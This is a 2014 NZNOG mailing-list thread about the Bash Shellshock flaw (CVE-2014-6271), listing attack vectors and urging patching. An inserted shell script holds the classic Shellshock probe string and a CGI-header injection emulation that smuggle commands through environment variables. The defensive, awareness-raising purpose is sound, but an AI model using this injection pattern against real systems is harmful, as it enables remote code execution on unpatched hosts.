No, it's not only for bash CGI scripts - it's for anything that results in Bash being called.

For example, a Perl CGI script that calls system(). Or another binary that executes anything via bash.

Or an SSH server configured to use the "ForceCommand" option (e.g. to put the user into a captive menu rather than a shell). Or a DHCP client running dhclient-script.

There are dozens of potential vectors to abuse this one - many of which haven't even been thought of yet. Patch *now*, on all machines - regardless of whether they have a webserver or not.

- Scott
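An added, self-contained example (not part of the thread, and not Scott's or NZITF's code) to make the two points above concrete: a CGI gateway copies request headers into the environment verbatim, so "escaping" never enters the picture, and any child bash started with that environment is what does the interpreting. The function names (cgi_env_name, shellshock_probe, emulate_cgi_child) and the User-Agent value are constructed for illustration; the probe is the widely circulated one-liner for CVE-2014-6271 and only reports on the bash installed where you run it.

```shell
#!/bin/sh
# Added example, not from the original thread.
# (1) RFC 3875 header mapping: "User-Agent: <value>" becomes the environment
#     variable HTTP_USER_AGENT=<value>. The value is copied byte for byte; the
#     web server has no reason to quote or escape it, because it is data in an
#     environment variable, not part of a command line. An unpatched bash is what
#     later treats a value beginning with "() {" as a function definition and
#     runs whatever follows the closing brace.
cgi_env_name() {
    # $1 = HTTP header name; prints the CGI meta-variable name
    printf 'HTTP_%s\n' "$(printf '%s' "$1" | tr 'a-z' 'A-Z' | tr '-' '_')"
}

# (2) The probe. On an unpatched bash the trailing "echo VULNERABLE" executes
#     while the environment is imported, before "echo probe" ever runs. A patched
#     bash imports nothing from a plain variable and prints only "probe".
#     Exit status: 0 = not vulnerable, 1 = vulnerable, 2 = no bash found.
shellshock_probe() {
    command -v bash >/dev/null 2>&1 || { echo "no bash"; return 2; }
    out=$(env HTTP_USER_AGENT='() { :;}; echo VULNERABLE' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) echo "vulnerable";     return 1 ;;
        *)            echo "not vulnerable"; return 0 ;;
    esac
}

# (3) The Perl-CGI-style vector from the reply, emulated: the "CGI" is any
#     program that inherits the request environment and then spawns bash, even
#     for a command with no attacker input in it. The same mechanism applies to
#     sshd's ForceCommand, which exposes the client's requested command as
#     SSH_ORIGINAL_COMMAND and runs the forced command through the login shell.
emulate_cgi_child() {
    # $1 = attacker-supplied User-Agent value (constructed for this example)
    ua="$1"
    env "$(cgi_env_name User-Agent)=$ua" bash -c 'echo "served page"' 2>/dev/null
}

if [ "${1:-}" = "run" ]; then
    shellshock_probe
    emulate_cgi_child '() { :;}; echo INJECTED'
fi
```

Run it as `sh shellshock-probe.sh run`: a patched host prints "not vulnerable" and "served page" only; an unpatched one prints "vulnerable" and an extra "INJECTED" line before the page, with nothing on the command line having changed.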



On Sat, Sep 27, 2014 at 10:45 AM, Eliezer Croitoru <eliezer@ngtech.co.il> wrote:
Isn't this issue only for bash CGI scripts?
And how exactly do httpd and others set the environment variables? Aren't they escaping the strings into literal ones, which would just disable any bash-related issues?

Eliezer

On 09/25/2014 01:57 AM, Dean Pemberton wrote:
Hi all,
This isn't normally a security vuln release list, but this one looks pretty bad.

A newly discovered vulnerability (CVE-2014-6271) in the Bash
command-line interpreter poses a critical security risk to Unix and
Linux systems. It allows remote code execution.

NZITF is responding to this remote execution exploit, with a News page
that we will be keeping up to date - http://www.nzitf.org.nz/news.html.

We are also reaching out to technical and security community points of
contact to raise awareness to the issue and ensure necessary action is
taken (hence this email to you). Please note, no patch is yet
available for Mac OS X. However, many other patches are available.

So Patch, Patch, Patch.


Regards,
Dea
_______________________________________________
NZNOG mailing list
NZNOG@list.waikato.ac.nz
http://list.waikato.ac.nz/mailman/listinfo/nznog